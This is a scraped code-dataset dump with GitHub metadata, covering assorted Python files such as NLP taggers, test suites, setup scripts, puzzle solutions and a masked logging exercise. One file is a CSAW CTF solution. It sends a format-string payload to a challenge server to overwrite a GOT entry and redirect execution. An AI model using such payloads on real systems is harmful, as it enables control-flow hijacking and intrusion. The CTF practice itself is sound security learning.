# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.en.graph_utils import (
MIN_NEG_WEIGHT,
NEMO_ALPHA,
NEMO_DIGIT,
NEMO_NOT_SPACE,
NEMO_SIGMA,
GraphFst,
convert_space,
get_abs_path,
)
from nemo_text_processing.text_normalization.en.taggers.punctuation import PunctuationFst
from pynini.examples import plurals
from pynini.lib import pynutil
class WordFst(GraphFst):
"""
Finite state transducer for classifying word. Considers sentence boundary exceptions.
e.g. sleep -> tokens { name: "sleep" }
Args:
punctuation: PunctuationFst
deterministic: if True will provide a single transduction option,
for False multiple transduction are generated (used for audio-based normalization)
"""
def __init__(self, punctuation: GraphFst, deterministic: bool = True):
super().__init__(name="word", kind="classify", deterministic=deterministic)
punct = PunctuationFst().graph
default_graph = pynini.closure(pynini.difference(NEMO_NOT_SPACE, punct.project("input")), 1)
symbols_to_exclude = (pynini.union("$", "€", "₩", "£", "¥", "#", "%") | NEMO_DIGIT).optimize()
graph = pynini.closure(pynini.difference(NEMO_NOT_SPACE, symbols_to_exclude), 1)
graph = pynutil.add_weight(graph, MIN_NEG_WEIGHT) | default_graph
# leave phones of format [HH AH0 L OW1] untouched
phoneme_unit = pynini.closure(NEMO_ALPHA, 1) + pynini.closure(NEMO_DIGIT)
phoneme = (
pynini.accep(pynini.escape("["))
+ pynini.closure(phoneme_unit + pynini.accep(" "))
+ phoneme_unit
+ pynini.accep(pynini.escape("]"))
)
# leave IPA phones of format [ˈdoʊv] untouched, single words and sentences with punctuation marks allowed
punct_marks = pynini.union(*punctuation.punct_marks).optimize()
stress = pynini.union("ˈ", "'", "ˌ")
ipa_phoneme_unit = pynini.string_file(get_abs_path("data/whitelist/ipa_symbols.tsv"))
# word in ipa form
ipa_phonemes = (
pynini.closure(stress, 0, 1)
+ pynini.closure(ipa_phoneme_unit, 1)
+ pynini.closure(stress | ipa_phoneme_unit)
)
# allow sentences of words in IPA format separated with spaces or punct marks
delim = (punct_marks | pynini.accep(" ")) ** (1, ...)
ipa_phonemes = ipa_phonemes + pynini.closure(delim + ipa_phonemes) + pynini.closure(delim, 0, 1)
ipa_phonemes = (pynini.accep(pynini.escape("[")) + ipa_phonemes + pynini.accep(pynini.escape("]"))).optimize()
if not deterministic:
phoneme = (
pynini.accep(pynini.escape("["))
+ pynini.closure(pynini.accep(" "), 0, 1)
+ pynini.closure(phoneme_unit + pynini.accep(" "))
+ phoneme_unit
+ pynini.closure(pynini.accep(" "), 0, 1)
+ pynini.accep(pynini.escape("]"))
).optimize()
ipa_phonemes = (
pynini.accep(pynini.escape("[")) + ipa_phonemes + pynini.accep(pynini.escape("]"))
).optimize()
phoneme |= ipa_phonemes
self.graph = plurals._priority_union(convert_space(phoneme.optimize()), graph, NEMO_SIGMA)
self.fst = (pynutil.insert("name: \"") + self.graph + pynutil.insert("\"")).optimize()
| [
"noreply@github.com"
] | ericharper.noreply@github.com |
43828f5474ff42399bbff1723cd7221e5eef2dbd | ec85250addb7357dfe7bb3e0680d53fc7b0fd8fb | /python_modules/libraries/dagster-mlflow/setup.py | 552314aa025f85b9bf1cad2666fbd2c3b17c9277 | [
"Apache-2.0"
] | permissive | dagster-io/dagster | 6adb5deee8bcf3ea1866a6a64f2ed81e1db5e73a | fe21995e0402878437a828c6a4244025eac8c43b | refs/heads/master | 2023-09-05T20:46:08.203794 | 2023-09-05T19:54:52 | 2023-09-05T19:54:52 | 131,619,646 | 8,565 | 1,154 | Apache-2.0 | 2023-09-14T21:57:37 | 2018-04-30T16:30:04 | Python | UTF-8 | Python | false | false | 1,182 | py | from pathlib import Path
from typing import Dict
from setuptools import find_packages, setup
def get_version() -> str:
version: Dict[str, str] = {}
with open(Path(__file__).parent / "dagster_mlflow/version.py", encoding="utf8") as fp:
exec(fp.read(), version)
return version["__version__"]
ver = get_version()
# dont pin dev installs to avoid pip dep resolver issues
pin = "" if ver == "1!0+dev" else f"=={ver}"
setup(
name="dagster-mlflow",
version=get_version(),
author="Elementl",
author_email="hello@elementl.com",
license="Apache-2.0",
description="Package for mlflow Dagster framework components.",
url="https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-mlflow",
classifiers=[
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
packages=find_packages(exclude=["dagster_mlflow_tests*"]),
install_requires=[f"dagster{pin}", "mlflow", "pandas"],
zip_safe=False,
)
| [
"noreply@github.com"
] | dagster-io.noreply@github.com |
4e6c7fc37d96589973c336770f2c0e6558b4a563 | 3b2867636844ab4b402ef091b61222a5870bae6e | /year2017/day11.py | 75e64438afc7810775e932d8cd33d43f4edb59b7 | [] | no_license | feigaoxyz/adventofcode | f992478ff6518930a60b9d4e15e5902d1f208f06 | 18918e16709eef833544f48d8c1a46c93d950000 | refs/heads/master | 2021-06-21T18:33:45.229440 | 2021-01-12T16:10:03 | 2021-01-12T16:10:03 | 51,060,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,276 | py | from common import load_input
import math
import collections
PART1_DOC = """Part 1:
"""
PART2_DOC = """Part 2:
"""
example = """
"""
input_data = load_input(__file__.split('.')[0] + '_in.txt').strip()
dir2pos = {
'ne': (1, 0),
'n': (0, 1),
'nw': (-1, 1),
's': (0, -1),
'sw': (-1, 0),
'se': (1, -1)
}
def hex_distance(steps: str, init_pos: (int, int) = (0, 0)) -> (int, (int, int)):
# print(collections.Counter(steps.split(',')))
x, y = init_pos
for step in steps.split(','):
dx, dy = dir2pos[step]
x += dx
y += dy
if x * y >= 0:
return (abs(x) + abs(y), (x, y))
else:
return max(abs(x), abs(y)), (x, y)
fn_p1 = hex_distance
print("Part 1 example:", fn_p1("ne,ne,ne"))
print("Part 1 example:", fn_p1("ne,ne,sw,sw"))
print("Part 1 example:", fn_p1("ne,ne,s,s"))
print("Part 1 example:", fn_p1("se,sw,se,sw,sw"))
print("Part 1:", fn_p1(input_data)) # 682
def furthest(steps: str) -> int:
pos = (0, 0)
max_dist = 0
for step in steps.split(','):
dist, pos = hex_distance(step, pos)
if dist > max_dist:
max_dist = dist
return max_dist
fn_p2 = furthest
# print("Part 2 example:", fn_p2(example))
print("Part 2:", fn_p2(input_data)) # 1406
| [
"contact@feigao.org"
] | contact@feigao.org |
ae4b7f7157b4d2db0c88c8dc2ca34403c999109b | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /090_logging/_exercises/_templates/github/_python-logging-examples-master(1)/python-logging-examples-master/simplelogging.py | f557ad857ecc4355d986269d2a0513a869a4214a | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 365 | py | """ uses logging instead of prints, but no explicit logging config"""
______ verboselib
______ ?
__ -n __ '__main__':
vl _ verboselib.Noisy()
?.i..("This, and the logging from Noisy, will not be output.")
?.i..("because the default level is w..")
vl.do_debug()
vl.do_info()
?.w..("Watch out! about to log from noisy!")
vl.do_warn()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
396b9355988ee6e7eaf7adba310ca1b98eda3d28 | 53384d9322bc867dc55e1c057052e6a65101fde5 | /project-addons/alg_custom/product.py | 57835f451306b0b17a1098b2f076b60525f28211 | [] | no_license | Comunitea/PXGO_00015_2014_alg | ce80059a843e2eb76c7eee889fb64d45729add84 | 83026b9eab791dd8892dfb39cd0b07ada23aa2ab | refs/heads/master | 2020-12-26T01:16:18.482404 | 2019-05-20T12:36:18 | 2019-05-20T12:36:18 | 58,064,428 | 0 | 0 | null | 2016-05-04T15:47:27 | 2016-05-04T15:47:26 | null | UTF-8 | Python | false | false | 1,271 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2014 Pexego (<http://www.pexego.es>).
# $Omar Castiñeira Saavedra$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
class ProductProduct(orm.Model):
_inherit = "product.product"
_columns = {
'clean_part': fields.boolean('Clean Part product'),
'clean_part_prod': fields.boolean('Production Associated')
}
| [
"javierjcf@gmail.com"
] | javierjcf@gmail.com |
c437147abe11532977bc856b8a12cd72feafb324 | ec7591c3f478c43e76257aaa500d8f6a2e763d74 | /stanza/tests/pipeline/test_pipeline_constituency_processor.py | 9a5372063a5f6a995ccdbd1378abb6c219a5306c | [
"Apache-2.0"
] | permissive | stanfordnlp/stanza | 5cc3dbe70a96dd565639b7dae1efde6b4fa76985 | c530c9af647d521262b56b717bcc38b0cfc5f1b8 | refs/heads/main | 2023-09-01T12:01:38.980322 | 2023-03-14T16:10:05 | 2023-03-14T16:10:05 | 104,854,615 | 4,281 | 599 | NOASSERTION | 2023-09-10T00:31:36 | 2017-09-26T08:00:56 | Python | UTF-8 | Python | false | false | 2,678 | py |
import pytest
import stanza
from stanza.models.common.foundation_cache import FoundationCache
from stanza.tests import *
pytestmark = [pytest.mark.pipeline, pytest.mark.travis]
# data for testing
TEST_TEXT = "This is a test. Another sentence. Are these sorted?"
TEST_TOKENS = [["This", "is", "a", "test", "."], ["Another", "sentence", "."], ["Are", "these", "sorted", "?"]]
@pytest.fixture(scope="module")
def foundation_cache():
return FoundationCache()
def check_results(doc):
assert len(doc.sentences) == len(TEST_TOKENS)
for sentence, expected in zip(doc.sentences, TEST_TOKENS):
assert sentence.constituency.leaf_labels() == expected
def test_sorted_big_batch(foundation_cache):
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
def test_comments(foundation_cache):
"""
Test that the pipeline is creating constituency comments
"""
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
for sentence in doc.sentences:
assert any(x.startswith("# constituency = ") for x in sentence.comments)
doc.sentences[0].constituency = "asdf"
assert "# constituency = asdf" in doc.sentences[0].comments
for sentence in doc.sentences:
assert len([x for x in sentence.comments if x.startswith("# constituency")]) == 1
def test_illegal_batch_size(foundation_cache):
stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos", constituency_batch_size="zzz", foundation_cache=foundation_cache)
with pytest.raises(ValueError):
stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", constituency_batch_size="zzz", foundation_cache=foundation_cache)
def test_sorted_one_batch(foundation_cache):
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", constituency_batch_size=1, foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
def test_sorted_two_batch(foundation_cache):
pipe = stanza.Pipeline("en", model_dir=TEST_MODELS_DIR, processors="tokenize,pos,constituency", constituency_batch_size=2, foundation_cache=foundation_cache)
doc = pipe(TEST_TEXT)
check_results(doc)
def test_get_constituents(foundation_cache):
pipe = stanza.Pipeline("en", processors="tokenize,pos,constituency", foundation_cache=foundation_cache)
assert "SBAR" in pipe.processors["constituency"].get_constituents()
| [
"horatio@gmail.com"
] | horatio@gmail.com |
04f239e41086ce3397abfacce7557e7b91529a04 | 9e31cabea36b122be02fa778264a5c9a313a7a3c | /chapter_17/p17_11.py | cfa8e8e01bd74d21fe5d43746d650b0967a3060a | [] | no_license | anywhere1234/CTCI_python | b1c27997fe20d17f48b423e647fed600811ab015 | 6c7e71f4829708da397867dd9b2cec61a654d3f9 | refs/heads/master | 2023-02-09T14:02:29.710006 | 2021-01-06T00:04:58 | 2021-01-06T00:04:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | # idea: Reverse index
# create mapping from key: word , value: sorted set of occurences (count words in book)
# when looking for shortest distance between 2 words, run 2 pointers in the sorted arr, find min diff
import re
from typing import List
from collections import defaultdict
import os
def build_reverse_index(words: List[str]):
rev_index = defaultdict(list)
for index, word in enumerate(words):
rev_index[word].append(index)
return dict(rev_index)
def get_min_interword_distance(w1: str, w2: str, rev_index: dict):
occ_w1 = rev_index[w1]
occ_w2 = rev_index[w2]
if not occ_w1 or not occ_w2:
raise Exception("Not all words present")
min_sum = float('inf')
p1 = 0
p2 = 0
while p1 < len(occ_w1) and p2 < len(occ_w2):
diff_now = abs(occ_w1[p1] - occ_w2[p2])
if diff_now < min_sum:
min_sum = diff_now
if occ_w1[p1] > occ_w2[p2]:
p2 += 1
else:
p1 += 1
return min_sum
if __name__ == "__main__":
with open(os.path.join("utils", "lorem_ipsum.txt")) as words_source:
all_non_empty_words = filter(
bool, re.split(" |\n|\.", words_source.read()))
all_text = list(map(lambda x: x.lower(), all_non_empty_words))
reverse_index = build_reverse_index(all_text)
exs = [
("ultrices", "bibendum"),
("hendrerit", "nulla"),
]
for w1, w2 in exs:
print(f"Shortest distance b/t {w1} and {w2}"
f" at {get_min_interword_distance(w1,w2, reverse_index)}")
| [
"bogdan.stoicescu95@gmail.com"
] | bogdan.stoicescu95@gmail.com |
c1cb502b18baa9d3b28238e40b364115d4dcf14d | e57d7785276053332c633b57f6925c90ad660580 | /sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/asynctestcase.py | 8893eeede181712ff1d1c85e0b584844f1b1b35e | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | adriananeci/azure-sdk-for-python | 0d560308497616a563b6afecbb494a88535da4c5 | b2bdfe659210998d6d479e73b133b6c51eb2c009 | refs/heads/main | 2023-08-18T11:12:21.271042 | 2021-09-10T18:48:44 | 2021-09-10T18:48:44 | 405,684,423 | 1 | 0 | MIT | 2021-09-12T15:51:51 | 2021-09-12T15:51:50 | null | UTF-8 | Python | false | false | 1,383 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import asyncio
import functools
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from azure.core.credentials import AccessToken
from testcase import QuestionAnsweringTest
class AsyncFakeTokenCredential(object):
"""Protocol for classes able to provide OAuth tokens.
:param str scopes: Lets you specify the type of access needed.
"""
def __init__(self):
self.token = AccessToken("YOU SHALL NOT PASS", 0)
async def get_token(self, *args):
return self.token
class AsyncQuestionAnsweringTest(QuestionAnsweringTest):
def generate_oauth_token(self):
if self.is_live:
from azure.identity.aio import ClientSecretCredential
return ClientSecretCredential(
self.get_settings_value("TENANT_ID"),
self.get_settings_value("CLIENT_ID"),
self.get_settings_value("CLIENT_SECRET"),
)
return self.generate_fake_token()
def generate_fake_token(self):
return AsyncFakeTokenCredential()
| [
"noreply@github.com"
] | adriananeci.noreply@github.com |
697a2797b172121b01fb5d02a0a072ac5454aa70 | b41ae9e761a6b4606e128f9572c6f1a896ccfbdc | /migrations/versions/6e71f302e270_thought_table.py | 3b1330909e82e551eaf52ad38b025266c1fd7b15 | [] | no_license | chrishaining/Flask-Stoic-Thoughts | 9e8a4d2be4eb66ecd95b363812ccc289daefbdfd | d31b52d8844fb325825c76674387a88c42ba6a70 | refs/heads/master | 2021-02-07T02:45:33.235475 | 2020-03-01T15:59:37 | 2020-03-01T15:59:37 | 243,973,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | """thought table
Revision ID: 6e71f302e270
Revises:
Create Date: 2020-02-29 12:19:12.158186
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6e71f302e270'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('thought',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('quotation', sa.Text(), nullable=True),
sa.Column('comment', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_thought_quotation'), 'thought', ['quotation'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_thought_quotation'), table_name='thought')
op.drop_table('thought')
# ### end Alembic commands ###
| [
"chrishaining@yahoo.co.uk"
] | chrishaining@yahoo.co.uk |
330a6979ee3a64de179f3b718dcb8e9c5940b492 | faa1a9f8bfa60c6f3c1543ddf5c01ea8d6ec5898 | /CSAW-2019/Pwn/GOT Milk/exploit2.py | b66230aec1df4cf08fba47718917a204d01fb896 | [] | no_license | LJP-TW/CTF | afe0873029072da256b591c96a0b2a97df6644b2 | f9c30cf270130120bfe4ddf957299fb60ddf8c27 | refs/heads/master | 2023-05-27T17:08:56.579815 | 2023-05-22T10:33:42 | 2023-05-22T10:33:42 | 123,657,738 | 30 | 5 | null | 2023-05-22T10:32:56 | 2018-03-03T04:08:05 | Smali | UTF-8 | Python | false | false | 385 | py | from pwn import *
from struct import *
# r = remote('localhost', 5566)
r = remote('pwn.chal.csaw.io', 1004)
addrLosePlt = 0x804a010
offsetLose = 0x11f8
offsetWin = 0x1189
raw_input('>')
payload = ''
payload += pack('<I', addrLosePlt) # Will write 4 bytes
payload += '%133x' # Write bytes for %n 0x89
payload += '%7$hhn' # Cover GOT
r.sendline(payload)
r.interactive()
| [
"accr94238@gmail.com"
] | accr94238@gmail.com |
66c8f43291c37439cb67bb146852b74f5ae5d297 | 019e125f8b893512e252aaf27ff6b957c2cc302d | /src/blueshed/fling/request.py | b5acbf2d18d41495e27914684bf74ce67d45c85c | [
"MIT"
] | permissive | blueshed/blueshed-py | 62523beae9e43a8f8ef065a627cae58b238e7244 | 61be378d8e24e60775cc2b8a6f17c6e959098fa2 | refs/heads/master | 2021-01-10T21:29:38.244214 | 2015-09-25T18:16:08 | 2015-09-25T18:16:08 | 38,447,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | '''
Created on Nov 2, 2013
@author: peterb
'''
class Request(object):
def __init__(self, name, options=None, callback=None, request_id=None):
self.name = name
self.options = options
self.request_id = request_id
self._callback = callback
self._handled = False
self._result = None
self._error = None
def cancel(self):
self._callback = None
@property
def handled(self):
return self._handled
@handled.setter
def handled(self, value):
self._handled = value
@property
def result(self):
return self._result
@result.setter
def result(self, value):
self._result = value
self.handled = True
if self._callback:
self._callback(self)
@property
def error(self):
return self._error
@error.setter
def error(self, value):
self._error = value
self.handled = True
if self._callback:
self._callback(self)
def __str__(self):
return "request:{}[{}]".format(self.name, self.request_id)
| [
"pete@blueshed.co.uk"
] | pete@blueshed.co.uk |
ce7b219f9a39eb4862625197e86d97bb10c3f8d3 | 6221ffae1ba52c8cbf12795e8696383248aae108 | /tf_agents/train/utils/strategy_utils.py | d2e5caf3763ecbe7d75ddd3b5b99917bfbb73cef | [
"Apache-2.0"
] | permissive | minsukchang/agents | c7a7be5d87d56b56048ec1dee7dcd3b45816d68b | 5b8dd0e589dab4c7d8ef28c3dfb99ba46d7d0f7d | refs/heads/master | 2022-02-13T21:30:30.093985 | 2022-01-25T15:52:09 | 2022-01-25T15:52:36 | 205,996,831 | 0 | 0 | Apache-2.0 | 2019-09-03T05:36:05 | 2019-09-03T05:36:05 | null | UTF-8 | Python | false | false | 2,113 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utilities for managing distrubtion strategies."""
from absl import flags
from absl import logging
import tensorflow.compat.v2 as tf
flags.DEFINE_string('tpu', None, 'BNS address for the TPU')
flags.DEFINE_bool('use_gpu', False, 'If True a MirroredStrategy will be used.')
def get_strategy(tpu, use_gpu):
"""Utility to create a `tf.DistributionStrategy` for TPU or GPU.
If neither is being used a DefaultStrategy is returned which allows executing
on CPU only.
Args:
tpu: BNS address of TPU to use. Note the flag and param are called TPU as
that is what the xmanager utilities call.
use_gpu: Whether a GPU should be used. This will create a MirroredStrategy.
Raises:
ValueError if both tpu and use_gpu are set.
Returns:
An instance of a `tf.DistributionStrategy`.
"""
if tpu and use_gpu:
raise ValueError('Only one of tpu or use_gpu should be provided.')
if tpu or use_gpu:
logging.info('Devices: \n%s', tf.config.list_logical_devices())
if tpu:
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=tpu)
tf.config.experimental_connect_to_cluster(resolver)
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.TPUStrategy(resolver)
else:
strategy = tf.distribute.MirroredStrategy()
logging.info('Devices after getting strategy:\n%s',
tf.config.list_logical_devices())
else:
strategy = tf.distribute.get_strategy()
return strategy
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
ec84607554daf8ed75b3f772e636a1ca9442b18b | 09cead98874a64d55b9e5c84b369d3523c890442 | /py200510_python2/day16_py200708/sample/dict_sorting_value.py | 7dbd9333db5eb252d818d16c62b84d787fe96cb9 | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | """
Python dictionary
Sorting by value
references:
https://blog.csdn.net/buster2014/article/details/50939892
"""
def sort_by_value(mydict):
"""
:param mydict:
:return: sorted dict by value, displaying key
"""
items = mydict.items()
backitems = [[v[1],v[0]] for v in items]
# backitems.sort()
backitems = sorted(backitems)
return [ backitems[i][1] for i in range(0,len(backitems))]
def sort_by_value2(mydict):
return [v for v in sorted(mydict.values())]
def sort_by_value3(mydict):
return sorted(mydict.items(), key=lambda item: item[1])
# main program
demo_dict = {
1: "c",
2: "a",
3: "b"
}
print("Original dictionary is: {}".format(demo_dict))
print()
# test 1
print("[info] testing sort_by_value()")
print(sort_by_value(demo_dict))
print()
# test 2
print("[info] testing sort_by_value2()")
print(sort_by_value2(demo_dict))
print()
# test 3
print("[info] testing sort_by_value3()")
print(sort_by_value3(demo_dict))
print()
| [
"lada314@gmail.com"
] | lada314@gmail.com |
bcb5f25ce5e10170fb1f81e674fb1c249cd299e2 | a81c07a5663d967c432a61d0b4a09de5187be87b | /components/signin/ios/browser/DEPS | 1cbae6d899d540a81f026f8560d662d4b42aac35 | [
"BSD-3-Clause"
] | permissive | junxuezheng/chromium | c401dec07f19878501801c9e9205a703e8643031 | 381ce9d478b684e0df5d149f59350e3bc634dad3 | refs/heads/master | 2023-02-28T17:07:31.342118 | 2019-09-03T01:42:42 | 2019-09-03T01:42:42 | 205,967,014 | 2 | 0 | BSD-3-Clause | 2019-09-03T01:48:23 | 2019-09-03T01:48:23 | null | UTF-8 | Python | false | false | 391 | specific_include_rules = {
"account_consistency_service.mm": [
"+components/signin/core/browser/account_reconcilor.h",
"+components/signin/core/browser/signin_header_helper.h",
],
"account_consistency_service_unittest.mm": [
"+components/signin/core/browser/account_reconcilor.h",
"+components/signin/core/browser/account_reconcilor_delegate.h",
],
}
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.